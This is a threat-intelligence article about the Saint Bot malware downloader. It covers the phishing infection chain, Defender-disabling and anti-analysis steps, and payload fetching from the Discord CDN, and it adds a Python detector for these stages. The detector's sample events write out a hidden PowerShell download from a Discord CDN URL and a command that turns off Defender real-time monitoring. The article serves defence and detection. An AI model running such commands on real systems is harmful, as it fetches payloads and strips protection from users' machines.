A new and previously unknown malware downloader, referred to as “Saint Bot,” has emerged in recent phishing campaigns, designed to deploy credential-stealing malware and other malicious payloads. This downloader is reported to have made its debut in January 2021 and appears to be actively evolving in its capabilities.
Saint Bot operates as a downloader and has gained traction within the cybercriminal community. It has been reported to facilitate the distribution of various stealers, such as the Taurus Stealer, alongside further secondary loaders. Aleksandra “Hasherezade” Doniec, a threat intelligence analyst at Malwarebytes, noted that its framework is versatile enough to distribute different types of malware, indicating a sophisticated and flexible design strategy.
The infection chain, as outlined by cybersecurity analysts, begins with a phishing email carrying an embedded ZIP file misleadingly named “bitcoin.zip.” Although it masquerades as a bitcoin wallet, the archive holds a .LNK shortcut file that runs a PowerShell script. That script downloads the next stage, an executable named WindowsUpdate.exe, which in turn launches InstallUtil.exe; InstallUtil.exe then retrieves two further executables, def.exe and putty.exe.
The def.exe component is a batch script that disables Windows Defender, while putty.exe is what finally connects to the command-and-control (C2) server and enables further exploitation. Every stage combines obfuscation with anti-analysis measures, letting the operators work on compromised devices discreetly.
Saint Bot implements various mechanisms to perform “self-defense checks,” including verifying whether it is being executed in a virtual environment or is under analysis through debugging. Additionally, the malware is designed not to execute within Romania and specific countries in the Commonwealth of Independent States (CIS), such as Armenia, Belarus, Kazakhstan, Moldova, Russia, and Ukraine, which further suggests an awareness of its operational geography.
Saint Bot’s command set covers downloading and executing additional payloads from the C2 server, updating the bot itself, and uninstalling itself from infected machines. These functions may look limited, but because the malware is a downloader, the harm it can do is bounded only by whatever payload it is told to fetch.
In a notable tactical choice, Saint Bot retrieves its payloads from files hosted on Discord, reflecting a rising trend among threat actors who exploit legitimate platform functionalities for their C2 communications, thereby evading traditional security measures. Researchers from Cisco Talos highlighted that files uploaded to the Discord CDN can be accessed externally using hardcoded URLs, creating an avenue for malware distribution without requiring the Discord application to be installed.
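The chain described above (shortcut-launched PowerShell, InstallUtil.exe started by a dropped binary and then spawning executables, a Defender-disabling command, and payload retrieval from the Discord CDN) can be expressed as a small process-creation detector. This is an added example, not code from the article or from Malwarebytes; the event field names, file paths, the cdn.discordapp.com host pattern, the `<id>` placeholder and the Set-MpPreference command are assumptions, and the events are constructed.

```python
import re

# Constructed process-creation events modelled on the article's chain
# (parent -> child plus command line). Paths, the CDN host, the "<id>"
# placeholder and the Defender command are assumptions, not page data.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -w hidden -c "iwr https://cdn.discordapp.com/attachments/<id>/WindowsUpdate.exe -OutFile $env:TEMP\WindowsUpdate.exe"'},
    {"parent_image": r"C:\Users\alice\AppData\Local\Temp\WindowsUpdate.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "command_line": "InstallUtil.exe"},
    {"parent_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\def.exe", "command_line": "def.exe"},
    {"parent_image": r"C:\Users\alice\AppData\Local\Temp\def.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

DISCORD_CDN = re.compile(r"https?://cdn\.discordapp\.com/attachments/", re.I)  # assumed host
DOWNLOAD_PRIMITIVE = re.compile(r"\b(iwr|Invoke-WebRequest|DownloadFile|DownloadString|curl|wget)\b", re.I)
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")  # parents expected to start InstallUtil

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the chain stages a single process-creation event matches."""
    parent, cmd = ev["parent_image"], ev["command_line"]
    pb, ib = basename(parent), basename(ev["image"])
    hits = []
    if pb == "explorer.exe" and ib == "powershell.exe" and DOWNLOAD_PRIMITIVE.search(cmd):
        hits.append("lnk-powershell-download")      # shortcut lure runs PowerShell that fetches stage 2
    if ib == "installutil.exe" and not parent.lower().startswith(TRUSTED_DIRS):
        hits.append("installutil-from-user-path")   # InstallUtil started by a dropped binary
    if pb == "installutil.exe":
        hits.append("installutil-child-process")    # InstallUtil spawning def.exe / putty.exe
    if DEFENDER_TAMPER.search(cmd):
        hits.append("defender-tamper")              # def.exe switching Defender off
    if DISCORD_CDN.search(cmd):
        hits.append("discord-cdn-fetch")            # payload pulled from the Discord CDN
    return hits

def detect(events):
    """Map each matched stage to the image basenames that triggered it."""
    found = {}
    for ev in events:
        for stage in classify(ev):
            found.setdefault(stage, []).append(basename(ev["image"]))
    return found
```

On the constructed events, only the notepad.exe launch produces no hits; in a real deployment the Discord and download patterns would be tuned against the telemetry source's normal baseline.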
Overall, while Saint Bot represents a nascent downloader not as advanced as some of its predecessors like SmokeLoader, its ongoing development and the sophistication of techniques employed indicate a potential increase in threat levels. The methods observed, while fundamentally rooted in established malware practices, reveal an evolving landscape in cyber threats requiring continuous vigilance from business owners and cybersecurity professionals alike.